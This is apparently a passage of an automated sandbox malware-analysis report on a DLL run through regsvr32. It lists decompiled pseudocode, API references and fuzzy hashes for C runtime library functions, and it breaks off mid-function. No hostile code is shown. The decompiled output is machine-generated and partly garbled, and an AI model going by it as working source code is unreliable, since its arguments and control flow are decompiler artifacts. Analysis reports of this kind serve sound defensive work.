Opcode ID: 26becd220303018106cd234ffe4ebfb24dc66a80549a63e170b8fb2b1986c4fe
Instruction ID: a6e3b15f71f918cb66866dc210aed2cc4814bc37486599a2dae54e168f890f35
Opcode Fuzzy Hash: 26becd220303018106cd234ffe4ebfb24dc66a80549a63e170b8fb2b1986c4fe
Instruction Fuzzy Hash: F241E922B0754381EA22A715DE6157DE694EF42B98F108131DA0D477F2DEBCE442F2C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B075524 Relevance: 6.1, APIs: 4, Instructions: 102
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 31%

			E00007FFD7FFD2B075524(signed int __edx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
				int _t23;
				void* _t26;
				int _t28;
				intOrPtr _t43;
				int _t45;
				signed long long _t55;
				long long _t63;
				long long _t66;
				void* _t69;
				signed long long _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t90;
				void* _t91;
				int _t92;
				void* _t93;

				_t82 = _t81 - 0x40;
				_t1 = _t82 + 0x30; // -31
				_t80 = _t1;
				 *((long long*)(_t80 + 0x40)) = __rbx;
				 *((long long*)(_t80 + 0x48)) = __rsi;
				 *((long long*)(_t80 + 0x50)) = __rdi;
				_t55 =  *0x2b0c70a0; // 0xf787487f4682
				 *_t80 = _t55 ^ _t80;
				r13d = r9d;
				_t93 = __r8;
				r15d = __edx;
				if ( *((intOrPtr*)(_t80 + 0x68)) != 0) goto 0x2b075569;
				_t43 =  *((intOrPtr*)( *__rcx + 4));
				 *(_t80 + 0x70) =  ~( *(_t80 + 0x70));
				 *((intOrPtr*)(_t82 + 0x28)) = 0;
				asm("sbb edx, edx");
				 *((long long*)(_t82 + 0x20)) = __rdi;
				_t23 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				_t92 = _t23;
				_t45 = _t23;
				if (_t45 != 0) goto 0x2b075592;
				goto 0x2b07565c;
				if (_t45 <= 0) goto 0x2b0755fb;
				if (_t92 - 0xfffffff0 > 0) goto 0x2b0755fb;
				_t12 = _t92 + 0x10; // 0x10
				_t69 = _t92 + _t12;
				if (_t69 - 0x400 > 0) goto 0x2b0755e2;
				_t13 = _t69 + 0xf; // 0x1f
				if (_t13 - _t69 > 0) goto 0x2b0755c4;
				E00007FFD7FFD2B07A210(0, 0xffffffffffffff0, _t90, _t91);
				_t83 = _t82 - 0xfffffff0;
				_t14 = _t83 + 0x30; // -31
				_t63 = _t14;
				if (_t63 == 0) goto 0x2b07558b;
				 *_t63 = 0xcccc;
				goto 0x2b0755f5;
				_t26 = E00007FFD7FFD2B0652E4(0xffffffffffffff0, _t63, _t69, __rsi);
				if (0xfffffff0 == 0) goto 0x2b0755fe;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x2b0755fe;
				_t66 = __rdi;
				if (__rdi == 0) goto 0x2b07558b;
				E00007FFD7FFD2B0656D0(_t26, _t43, 0, __rdi, __rdx, _t92 + _t92);
				r9d = r13d;
				 *((intOrPtr*)(_t83 + 0x28)) = r12d;
				 *((long long*)(_t83 + 0x20)) = __rdi;
				_t28 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t28 == 0) goto 0x2b075649;
				r8d = _t28;
				GetStringTypeW(??, ??, ??, ??);
				_t18 = _t66 - 0x10; // -16
				if ( *_t18 != 0xdddd) goto 0x2b07565a;
				free(??);
				return E00007FFD7FFD2B064980(r15d,  *_t80 ^ _t80, __rdi, _t93);
			}

0x7ffd2b07552e
0x7ffd2b075532
0x7ffd2b075532
0x7ffd2b075537
0x7ffd2b07553b
0x7ffd2b07553f
0x7ffd2b075543
0x7ffd2b07554d
0x7ffd2b075556
0x7ffd2b075559
0x7ffd2b07555c
0x7ffd2b075561
0x7ffd2b075566
0x7ffd2b075569
0x7ffd2b07556e
0x7ffd2b075572
0x7ffd2b075574
0x7ffd2b07557e
0x7ffd2b075584
0x7ffd2b075587
0x7ffd2b075589
0x7ffd2b07558d
0x7ffd2b075592
0x7ffd2b0755a1
0x7ffd2b0755a3
0x7ffd2b0755a3
0x7ffd2b0755af
0x7ffd2b0755b1
0x7ffd2b0755b8
0x7ffd2b0755c8
0x7ffd2b0755cd
0x7ffd2b0755d0
0x7ffd2b0755d0
0x7ffd2b0755d8
0x7ffd2b0755da
0x7ffd2b0755e0
0x7ffd2b0755e2
0x7ffd2b0755ed
0x7ffd2b0755ef
0x7ffd2b0755f9
0x7ffd2b0755fb
0x7ffd2b075601
0x7ffd2b07560e
0x7ffd2b075613
0x7ffd2b075620
0x7ffd2b075625
0x7ffd2b07562a
0x7ffd2b075632
0x7ffd2b075638
0x7ffd2b075641
0x7ffd2b075649
0x7ffd2b075653
0x7ffd2b075655
0x7ffd2b075681

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFD2B07557E
MultiByteToWideChar.KERNEL32 ref: 00007FFD2B07562A
GetStringTypeW.KERNEL32 ref: 00007FFD2B075641
free.LIBCMT ref: 00007FFD2B075655

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$StringTypefree
String ID:
API String ID: 3522554955-0
Opcode ID: 012ca370cfe8b8dd57c4f755b3acaeec1c7902dadb39f85116b475ce24ba9a04
Instruction ID: b1cd0ec62d0eb15096168185db796618bbd05b7e346b8195c0cd80806e50bc91
Opcode Fuzzy Hash: 012ca370cfe8b8dd57c4f755b3acaeec1c7902dadb39f85116b475ce24ba9a04
Instruction Fuzzy Hash: FE419722B06B818AEB118F259D201AD6395FF45BB4F184235EE2D477E6DF7CE401E340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07A6AC Relevance: 6.1, APIs: 4, Instructions: 80
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E00007FFD7FFD2B07A6AC(intOrPtr* __rax, long long __rbx, signed int __rcx, char* __rdx, signed int __rsi, void* __r8, long long _a8, long long _a16, intOrPtr _a40) {
				signed int _t19;
				signed int _t32;
				void* _t53;
				void* _t54;
				char* _t66;
				char* _t67;
				intOrPtr* _t68;
				char* _t70;

				_a8 = __rbx;
				_a16 = __rsi;
				if (__rdx != 0) goto 0x2b07a6e4;
				E00007FFD7FFD2B067698(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b07a792;
				if (__r8 == 0) goto 0x2b07a6cc;
				 *__rdx = 0;
				asm("dec eax");
				_t53 =  ~__rcx + 1;
				if (__r8 - _t53 > 0) goto 0x2b07a70e;
				E00007FFD7FFD2B067698(__rax);
				goto 0x2b07a6d6;
				_t19 = __rsi - 2;
				if (_t19 - 0x22 > 0) goto 0x2b07a6cc;
				if (_a40 == 0) goto 0x2b07a731;
				 *__rdx = 0x2d;
				_t66 = __rdx + 1;
				_t70 = _t66;
				_t32 = _t19 % __rsi;
				if (_t32 - 9 <= 0) goto 0x2b07a749;
				goto 0x2b07a74c;
				 *_t66 = _t32 + 0x87;
				_t54 = _t53 + 1;
				_t67 = _t66 + 1;
				if ( ~__rcx == 0) goto 0x2b07a75f;
				if (_t54 - __r8 < 0) goto 0x2b07a734;
				if (_t54 - __r8 < 0) goto 0x2b07a772;
				 *__rdx = 0;
				E00007FFD7FFD2B067698( ~__rcx);
				goto 0x2b07a6d6;
				 *_t67 = 0;
				_t68 = _t67 - 1;
				 *_t68 =  *_t70;
				 *_t70 =  *_t68;
				if (_t70 + 1 - _t68 - 1 < 0) goto 0x2b07a779;
				return 0;
			}

0x7ffd2b07a6ac
0x7ffd2b07a6b1
0x7ffd2b07a6ca
0x7ffd2b07a6cc
0x7ffd2b07a6d6
0x7ffd2b07a6d8
0x7ffd2b07a6df
0x7ffd2b07a6e7
0x7ffd2b07a6e9
0x7ffd2b07a6f4
0x7ffd2b07a6fa
0x7ffd2b07a700
0x7ffd2b07a702
0x7ffd2b07a70c
0x7ffd2b07a70e
0x7ffd2b07a718
0x7ffd2b07a721
0x7ffd2b07a723
0x7ffd2b07a727
0x7ffd2b07a731
0x7ffd2b07a739
0x7ffd2b07a742
0x7ffd2b07a747
0x7ffd2b07a74c
0x7ffd2b07a74f
0x7ffd2b07a752
0x7ffd2b07a758
0x7ffd2b07a75d
0x7ffd2b07a762
0x7ffd2b07a764
0x7ffd2b07a768
0x7ffd2b07a76d
0x7ffd2b07a772
0x7ffd2b07a776
0x7ffd2b07a77f
0x7ffd2b07a782
0x7ffd2b07a78e
0x7ffd2b07a7a1

APIs

_errno.LIBCMT ref: 00007FFD2B07A6CC
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07A6D8
_errno.LIBCMT ref: 00007FFD2B07A702
_errno.LIBCMT ref: 00007FFD2B07A768

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 454a581c9aef82d5c2a75e614494dd54dd2b682ed2281b821beb9cda3ca8224a
Instruction ID: 5ecb3cb525d6d018bdb6a7f2781b4c29c563696fc6c3b930d2450424a38fc371
Opcode Fuzzy Hash: 454a581c9aef82d5c2a75e614494dd54dd2b682ed2281b821beb9cda3ca8224a
Instruction Fuzzy Hash: C6210722B0E3C249FB468B669E6026DA791DB27780F148032DB59437E3D9EDA845F781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B07A558 Relevance: 6.1, APIs: 4, Instructions: 80
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E00007FFD7FFD2B07A558(signed int __ecx, intOrPtr* __rax, long long __rbx, signed int __rcx, char* __rdx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, intOrPtr _a40) {
				signed int _t20;
				signed int _t34;
				signed int _t37;
				signed int _t40;
				void* _t57;
				void* _t58;
				char* _t67;
				char* _t68;
				intOrPtr* _t69;
				void* _t71;
				char* _t72;

				_t71 = __r9;
				_a8 = __rbx;
				_a16 = __rsi;
				_t40 = r9d;
				_t74 = __rdx;
				_t37 = __ecx;
				if (__rdx != 0) goto 0x2b07a58f;
				E00007FFD7FFD2B067698(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD2B069444();
				goto 0x2b07a639;
				if (__r8 == 0) goto 0x2b07a577;
				 *__rdx = 0;
				asm("dec eax");
				_t57 =  ~__rcx + 1;
				if (__r8 - _t57 > 0) goto 0x2b07a5b9;
				E00007FFD7FFD2B067698(__rax);
				goto 0x2b07a581;
				_t4 = _t71 - 2; // -2
				if (_t4 - 0x22 > 0) goto 0x2b07a577;
				if (_a40 == 0) goto 0x2b07a5dc;
				 *__rdx = 0x2d;
				_t5 = _t74 + 1; // 0x13a
				_t67 = _t5;
				_t72 = _t67;
				_t20 =  ~_t37;
				_t34 = _t20 % _t40;
				if (_t34 - 9 <= 0) goto 0x2b07a5f1;
				goto 0x2b07a5f4;
				 *_t67 = _t34 + 0x87;
				_t58 = _t57 + 1;
				_t68 = _t67 + 1;
				if (_t20 / _t40 == 0) goto 0x2b07a606;
				if (_t58 - __r8 < 0) goto 0x2b07a5df;
				if (_t58 - __r8 < 0) goto 0x2b07a619;
				 *__rdx = 0;
				E00007FFD7FFD2B067698(__rax);
				goto 0x2b07a581;
				 *_t68 = 0;
				_t69 = _t68 - 1;
				 *_t69 =  *_t72;
				 *_t72 =  *_t69;
				if (_t72 + 1 - _t69 - 1 < 0) goto 0x2b07a620;
				return 0;
			}

0x7ffd2b07a558
0x7ffd2b07a558
0x7ffd2b07a55d
0x7ffd2b07a567
0x7ffd2b07a56d
0x7ffd2b07a570
0x7ffd2b07a575
0x7ffd2b07a577
0x7ffd2b07a581
0x7ffd2b07a583
0x7ffd2b07a58a
0x7ffd2b07a592
0x7ffd2b07a594
0x7ffd2b07a59f
0x7ffd2b07a5a5
0x7ffd2b07a5ab
0x7ffd2b07a5ad
0x7ffd2b07a5b7
0x7ffd2b07a5b9
0x7ffd2b07a5c4
0x7ffd2b07a5cd
0x7ffd2b07a5cf
0x7ffd2b07a5d3
0x7ffd2b07a5d3
0x7ffd2b07a5dc
0x7ffd2b07a5e1
0x7ffd2b07a5e3
0x7ffd2b07a5ea
0x7ffd2b07a5ef
0x7ffd2b07a5f4
0x7ffd2b07a5f7
0x7ffd2b07a5fa
0x7ffd2b07a5ff
0x7ffd2b07a604
0x7ffd2b07a609
0x7ffd2b07a60b
0x7ffd2b07a60f
0x7ffd2b07a614
0x7ffd2b07a619
0x7ffd2b07a61d
0x7ffd2b07a626
0x7ffd2b07a629
0x7ffd2b07a635
0x7ffd2b07a648

APIs

_errno.LIBCMT ref: 00007FFD2B07A577
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B07A583
_errno.LIBCMT ref: 00007FFD2B07A5AD
_errno.LIBCMT ref: 00007FFD2B07A60F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: e822f98671c07c2ce8ca044e1ea374783c45761b316b2f1ea4ea93c32f7f0e3c
Instruction ID: 8a5af02b076130e35db6e5f355b09734d291dbfd6664a75b5a4a7e1fab8e9f28
Opcode Fuzzy Hash: e822f98671c07c2ce8ca044e1ea374783c45761b316b2f1ea4ea93c32f7f0e3c
Instruction Fuzzy Hash: 4A21E762F0E2C34DF7468B66DE6067DA781DB56380F184032E719437A3DDED9845BB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B074E7C Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD2B0748D4: _set_statfp.LIBCMT ref: 00007FFD2B07490E
Part of subcall function 00007FFD2B0748D4: _set_statfp.LIBCMT ref: 00007FFD2B074B14

_raise_exc_ex.LIBCMT ref: 00007FFD2B074F02

Part of subcall function 00007FFD2B074B40: _errno.LIBCMT ref: 00007FFD2B074B50

_errcode.LIBCMT ref: 00007FFD2B074F0D
_umatherr.LIBCMT ref: 00007FFD2B074F3B
_ctrlfp.LIBCMT ref: 00007FFD2B074F51

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _set_statfp$_ctrlfp_errcode_errno_raise_exc_ex_umatherr
String ID:
API String ID: 3627922240-0
Opcode ID: 8890f3d1aad585699acb7d798ee0a6572a5914d0a9e669a1cd69efa2da621ede
Instruction ID: 0c5090b98e6dac7a8aa73eada5f38a3622dc21183f047977308a022ea2eb6f7e
Opcode Fuzzy Hash: 8890f3d1aad585699acb7d798ee0a6572a5914d0a9e669a1cd69efa2da621ede
Instruction Fuzzy Hash: 7031A226B15A4589E7228F38D8502FDB3A4EF8A388F081335EE0C17765DF78D5019780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B074D88 Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00007FFD7FFD2B074D88(signed int __ecx, void* __edx, void* __eflags, long long __rbx, void* __rcx, void* __r9) {
				void* __rdi;
				void* __rsi;
				signed int _t21;
				void* _t23;
				signed int _t24;
				void* _t27;
				void* _t28;
				signed int _t36;
				void* _t37;
				void* _t43;
				signed long long _t44;
				void* _t59;
				void* _t61;
				void* _t64;
				void* _t66;
				signed long long _t67;

				_t43 = _t66;
				 *((long long*)(_t43 + 0x10)) = __rbx;
				_t64 = _t43 - 0x57;
				_t67 = _t66 - 0xe0;
				asm("movaps [eax-0x28], xmm6");
				_t44 =  *0x2b0c70a0; // 0xf787487f4682
				 *(_t64 + 0x1f) = _t44 ^ _t67;
				_t37 = __edx;
				asm("movsd [ebp-0x59], xmm2");
				asm("movsd [ebp-0x61], xmm3");
				asm("movapd xmm6, xmm2");
				_t36 = __ecx;
				_t21 = E00007FFD7FFD2B0748D4(__ecx, _t44 ^ _t67,  *((intOrPtr*)(_t64 + 0x7f)), _t64 - 0x61,  *((intOrPtr*)(_t64 + 0x7f)));
				if (_t21 != 0) goto 0x2b074e06;
				 *(_t67 + 0x30) =  *(_t67 + 0x30) & _t21;
				 *(_t64 - 0x11) =  *(_t64 - 0x11) & 0xfffffffe;
				 *((long long*)(_t67 + 0x28)) = _t64 - 0x61;
				r9d = _t37;
				r8d = _t36;
				 *((long long*)(_t67 + 0x20)) = _t64 - 0x59;
				E00007FFD7FFD2B074574(_t21,  *((intOrPtr*)(_t64 + 0x7f)), _t64 - 0x51, _t64 + 0x7f, _t59, _t61);
				_t23 = E00007FFD7FFD2B074BA4(_t36);
				if ( *0x2b0c8460 != 0) goto 0x2b074e3d;
				if (_t23 == 0) goto 0x2b074e3d;
				asm("movsd xmm0, [ebp-0x61]");
				asm("xorpd xmm3, xmm3");
				asm("movapd xmm2, xmm6");
				 *((long long*)(_t67 + 0x28)) =  *((intOrPtr*)(_t64 + 0x7f));
				asm("movsd [esp+0x20], xmm0");
				_t24 = E00007FFD7FFD2B074BE8(_t23, _t37);
				goto 0x2b074e56;
				E00007FFD7FFD2B074B40(_t24, _t64 - 0x59);
				E00007FFD7FFD2B074FBC(_t28, _t36,  *((intOrPtr*)(_t64 + 0x7f)),  *((intOrPtr*)(_t64 + 0x7f)), _t64 + 0x7f, _t61, _t59, _t61);
				asm("movsd xmm0, [ebp-0x61]");
				_t27 = E00007FFD7FFD2B064980(_t24,  *(_t64 + 0x1f) ^ _t67, _t64 + 0x7f,  *((intOrPtr*)(_t64 + 0x7f)));
				asm("inc ecx");
				return _t27;
			}

0x7ffd2b074d88
0x7ffd2b074d8b
0x7ffd2b074d92
0x7ffd2b074d96
0x7ffd2b074d9d
0x7ffd2b074da1
0x7ffd2b074dab
0x7ffd2b074db3
0x7ffd2b074db9
0x7ffd2b074dbe
0x7ffd2b074dc3
0x7ffd2b074dca
0x7ffd2b074dcc
0x7ffd2b074dd3
0x7ffd2b074dd5
0x7ffd2b074dd9
0x7ffd2b074de1
0x7ffd2b074df2
0x7ffd2b074df5
0x7ffd2b074df8
0x7ffd2b074dfd
0x7ffd2b074e08
0x7ffd2b074e14
0x7ffd2b074e18
0x7ffd2b074e1a
0x7ffd2b074e1f
0x7ffd2b074e23
0x7ffd2b074e2b
0x7ffd2b074e30
0x7ffd2b074e36
0x7ffd2b074e3b
0x7ffd2b074e3f
0x7ffd2b074e4c
0x7ffd2b074e51
0x7ffd2b074e5d
0x7ffd2b074e6e
0x7ffd2b074e79

APIs

Part of subcall function 00007FFD2B0748D4: _set_statfp.LIBCMT ref: 00007FFD2B07490E
Part of subcall function 00007FFD2B0748D4: _set_statfp.LIBCMT ref: 00007FFD2B074B14

_raise_exc_ex.LIBCMT ref: 00007FFD2B074DFD

Part of subcall function 00007FFD2B074B40: _errno.LIBCMT ref: 00007FFD2B074B50

_errcode.LIBCMT ref: 00007FFD2B074E08
_umatherr.LIBCMT ref: 00007FFD2B074E36
_ctrlfp.LIBCMT ref: 00007FFD2B074E4C

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _set_statfp$_ctrlfp_errcode_errno_raise_exc_ex_umatherr
String ID:
API String ID: 3627922240-0
Opcode ID: 49f89b86d69a25b8b2a7744dc72d9119a528f445768c11ed6a09633d5e007dfa
Instruction ID: 5097588bd691123c451ef86fab9b390f1a05ef91ce08f4e52dec2e3536ff1bc7
Opcode Fuzzy Hash: 49f89b86d69a25b8b2a7744dc72d9119a528f445768c11ed6a09633d5e007dfa
Instruction Fuzzy Hash: 9C21B322F1AB4189E711CF34D9202FD63A5EB8A798F080235EE1D17665DF78D506E780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0713F0 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFD7FFD2B0713F0(long long __rcx, void* __rdi, long long __rsi, void* __r8) {
				void* __rbx;
				void* _t4;
				intOrPtr _t13;
				void* _t21;
				long long* _t22;
				long long* _t28;
				long long _t30;

				if (__rcx == 0) goto 0x2b071495;
				_t22 = __rcx;
				E00007FFD7FFD2B0696D8();
				_t13 =  *((intOrPtr*)(__rcx + 8));
				if (_t13 == 0) goto 0x2b071430;
				asm("lock dec dword [ecx]");
				if (_t13 != 0) goto 0x2b071430;
				if ( *((intOrPtr*)(__rcx + 8)) == 0x2b0c78c0) goto 0x2b071430;
				free(_t21);
				E00007FFD7FFD2B0695B8();
				if ( *((long long*)(__rcx)) == 0) goto 0x2b07147c;
				E00007FFD7FFD2B0696D8();
				E00007FFD7FFD2B071020(_t4,  *((intOrPtr*)(__rcx)), __r8);
				_t28 =  *((intOrPtr*)(__rcx));
				if (_t28 == 0) goto 0x2b071472;
				if ( *_t28 != 0) goto 0x2b071472;
				if (_t28 == 0x2b0c80c0) goto 0x2b071472;
				E00007FFD7FFD2B0710C4(__rcx, _t28, _t30, __rdi, __rsi);
				E00007FFD7FFD2B0695B8();
				 *_t22 = 0x2b0c80c0;
				 *((long long*)(_t22 + 8)) = 0x2b0c80c0;
				free(??);
				return 0xbaadf00d;
			}

0x7ffd2b0713f3
0x7ffd2b0713fe
0x7ffd2b071406
0x7ffd2b071410
0x7ffd2b071413
0x7ffd2b071415
0x7ffd2b071418
0x7ffd2b071428
0x7ffd2b07142a
0x7ffd2b071435
0x7ffd2b07143e
0x7ffd2b071445
0x7ffd2b07144e
0x7ffd2b071453
0x7ffd2b071459
0x7ffd2b07145e
0x7ffd2b07146a
0x7ffd2b07146c
0x7ffd2b071477
0x7ffd2b071481
0x7ffd2b071484
0x7ffd2b07148b
0x7ffd2b071495

APIs

_lock.LIBCMT ref: 00007FFD2B071406

Part of subcall function 00007FFD2B0696D8: _amsg_exit.LIBCMT ref: 00007FFD2B069702

free.LIBCMT ref: 00007FFD2B07142A

Part of subcall function 00007FFD2B06640C: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066422
Part of subcall function 00007FFD2B06640C: _errno.LIBCMT ref: 00007FFD2B06642C
Part of subcall function 00007FFD2B06640C: GetLastError.KERNEL32(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066434

_lock.LIBCMT ref: 00007FFD2B071445
free.LIBCMT ref: 00007FFD2B07148B

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _lockfree$ErrorLastPrivilegeRelease_amsg_exit_errno
String ID:
API String ID: 3411715761-0
Opcode ID: a8b7416102451f74a8af0c6d078df36bae68a8ac8152c0969ceab47448d70fac
Instruction ID: 3b51bd4dfbbed1577445f0704c4309756b6831010a6cc6292ab7b2a8fc84d6b9
Opcode Fuzzy Hash: a8b7416102451f74a8af0c6d078df36bae68a8ac8152c0969ceab47448d70fac
Instruction Fuzzy Hash: 5B115221F0B50285FF5B9B60CD357B96290DF46744F545131D64E072FADEACAC84B2E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B070978 Relevance: 6.0, APIs: 4, Instructions: 45
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00007FFD7FFD2B070978(void* __ecx, void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rsi, void* __rbp, long long _a8, long long _a16) {
				void* _t26;
				long long _t27;
				void* _t30;
				long long _t32;
				long long _t33;
				long long _t37;
				void* _t42;
				void* _t48;

				_t30 = __rax;
				_a16 = __rbx;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, __rax, __rcx, __rsi, _t48);
				_t42 = _t30;
				if (( *0x2b0c7df0 &  *(_t30 + 0xc8)) == 0) goto 0x2b0709ab;
				if ( *((long long*)(_t30 + 0xc0)) == 0) goto 0x2b0709ab;
				goto 0x2b070a17;
				E00007FFD7FFD2B0696D8();
				_t37 =  *((intOrPtr*)(_t42 + 0xb8));
				_a8 = _t37;
				_t26 = _t37 -  *0x2b0c7cf0; // 0xbe1d30
				if (_t26 == 0) goto 0x2b070a0d;
				_t27 = _t37;
